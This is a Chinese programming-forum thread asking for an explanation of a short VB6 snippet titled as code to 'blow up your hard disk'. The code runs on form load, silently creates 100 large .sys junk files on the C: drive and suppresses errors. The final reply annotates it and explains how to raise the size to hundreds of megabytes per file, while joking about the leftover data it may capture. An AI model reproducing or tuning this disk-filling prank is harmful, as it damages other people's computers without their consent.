| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 1029 人关注过本帖
标题:几句代码爆你硬盘.很短很精
只看楼主 加入收藏
b123456
Rank: 1
等 级:新手上路
帖 子:56
专家分:0
注 册:2008-9-22
收藏
 问题点数:0 回复次数:9 
几句代码爆你硬盘.很短很精
Private Sub Form_Load()
On Error Resume Next
For i = 1 To 100
     Open "c:\\20cn" + CStr(i) + ".sys" For Random As 1
  
DoEvents

Put #1, 30000, "

  
Next
End Sub
帮我解释一下这段代码.每句的意思.我不理解

[[it] 本帖最后由 b123456 于 2008-10-25 11:23 编辑 [/it]]
搜索更多相关主题的帖子: 硬盘 代码 
2008-10-25 10:52
我是菜鸟哦
Rank: 6Rank: 6
等 级:贵宾
威 望:22
帖 子:921
专家分:209
注 册:2007-5-4
收藏
得分:0 
不要做广告

偶是菜鸟鸟偶惧WHO?!!!!
2008-10-25 11:02
b123456
Rank: 1
等 级:新手上路
帖 子:56
专家分:0
注 册:2008-9-22
收藏
得分:0 
[bo][un]我是菜鸟哦[/un] 在 2008-10-25 11:02 的发言:[/bo]

不要做广告

不是广告阿.刚才我忘了写上了
2008-10-25 11:24
我是菜鸟哦
Rank: 6Rank: 6
等 级:贵宾
威 望:22
帖 子:921
专家分:209
注 册:2007-5-4
收藏
得分:0 
Put #1, 30000, " 涉及到指针操作,这个应该是向地址为30000的变量中放入“”内的数据

我也好久没看指针了,哪位大侠看出有什么错误请指正便是

偶是菜鸟鸟偶惧WHO?!!!!
2008-10-25 12:28
Joforn
Rank: 6Rank: 6
等 级:贵宾
威 望:23
帖 子:1242
专家分:122
注 册:2007-1-2
收藏
得分:0 
好玩么?

VB QQ群:47715789
2008-10-25 15:44
b123456
Rank: 1
等 级:新手上路
帖 子:56
专家分:0
注 册:2008-9-22
收藏
得分:0 
希望懂的给这几句话.帮我解释明白一下.我也是在别的站看到的.但不知道怎么用.我放到窗体中运行可没什么反映
2008-10-25 18:19
multiple1902
Rank: 8Rank: 8
等 级:贵宾
威 望:42
帖 子:4881
专家分:671
注 册:2007-2-9
收藏
得分:0 
[bo][un]b123456[/un] 在 2008-10-25 18:19 的发言:[/bo]

希望懂的给这几句话.帮我解释明白一下.我也是在别的站看到的.但不知道怎么用.我放到窗体中运行可没什么反映

自己找书看open语句 close语句 put语句是干啥的。
还不知道的话看c盘。
2008-10-25 18:34
e3bnsd
Rank: 1
等 级:新手上路
帖 子:58
专家分:0
注 册:2007-3-29
收藏
得分:0 
2012-12-07 00:41
wmpsxf
Rank: 1
等 级:新手上路
帖 子:4
专家分:0
注 册:2013-1-17
收藏
得分:0 
On Error Resume Next这句看懂了,是如果错了执行下一条
2013-01-17 19:40
好动小精灵
Rank: 1
等 级:新手上路
帖 子:3
专家分:0
注 册:2013-2-3
收藏
得分:0 
Private Sub Form_Load()

On Error Resume Next

For h = 1 To 100   注释:(这个100为写入文件的个数,就是向C盘下写100个文件)

   Open "c:\小黑侠" + CStr(h) + ".sys" For Random As 1
  注释:(在C盘下产生文件 类似 "小黑侠x.sys" x为数字)
DoEvents

Put #1, 30000, "小黑侠"

注释:这里的这个30000是控制生成文件大小的。
   注释:30000产生的文件大小是3.6M左右
   注释:10000产生的文件大小是1.2M左右
   注释:如果你改为3000000的话,那就是360M,不要太坏哦!
   注释:如果你想知道那么大的文件里面是什么,那就就用写字板打开看就是了,可能里面还有你的QQ密码也说不定。因为这些内容都是在你的缓存文件里随机产生的。不过你会在文件的最后一行看到有一个神秘的字符,那就是“小黑侠”字样。呵呵,我跑到你电脑里去玩了。
2013-02-03 20:26
快速回复:几句代码爆你硬盘.很短很精
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.016024 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved